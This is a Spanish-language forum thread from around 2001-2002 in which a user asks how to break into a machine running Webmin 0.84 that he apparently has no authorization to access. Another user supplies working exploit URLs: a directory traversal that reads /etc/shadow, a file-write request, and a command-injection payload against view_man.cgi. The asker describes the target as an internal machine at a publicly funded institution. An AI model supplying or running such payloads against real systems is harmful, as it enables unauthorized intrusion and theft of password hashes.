No se si valdrá de algo...
Pero no consigo acceder a un ordenador regido por esta herramienta
WeBMiN 0.84 (lo digo de memoria pero supongo que es esta versión)
Si alguien conoce backdoors o bugs de este sistema comunicadmelo
19-12-2001, 23:37
No se si valdrá de algo...
Pero no consigo acceder a un ordenador regido por esta herramienta
WeBMiN 0.84 (lo digo de memoria pero supongo que es esta versión)
Si alguien conoce backdoors o bugs de este sistema comunicadmelo
Como nadie ha respondido te pongo un par de exploits para el Webmin.A ver si tienes suerte , a mi me tienen funcionado.
El fallo es este script del Webmin init/edit_action.cgi ke peta:
<snip>
open(FILE, $file);
while(<FILE>) {
$data .= $_;
if (/^\s*(['\"]?)([a-z]+)\1\)/i) {
$hasarg{$2}++;
}
}
close(FILE);
</snip>
Estos son los exploits:
Escribir archivos en el server:
http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev
No comment:
http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow
Aki hay otro donde peta el view_man.cgi :
http://www.dominio.com:10000/man/view_man.cgi?page=ipcs&sec=8&opts=&for=rm
Rebooting OrdenaDor In My LinUX For TesTing It
Muchas Gracias Fiera!!!
No se si funcionará pero eres el único que te has molestado
Juas, si yo supiera, echaria un cable
Lo he probado y en las versiones 0.89 0.90 0.88 0.87 estos fallos estan solventados. La mákina con el 0.84 tengo qeu tener acceso local ya que esta denegado el acceso a ip's externas. Seguiré informando
Oka.O sea ke es un ordena de una red interna..mmm..mola xD.
Sip y además te puedo decir que es de un sitio con muchas ayudas de parte de la generalitat y que por llí pasan muchos estudiantes muy listos
Llegas un poco tarde no?? Mira la fecha del post.
un aporte es un aporte smaug_, siempre puede haber alguien que nesecite informacion
BUeno, aunque siendo una vulnerabilidad del 2002, creo que ya estara mas que subsanada.
Marcadores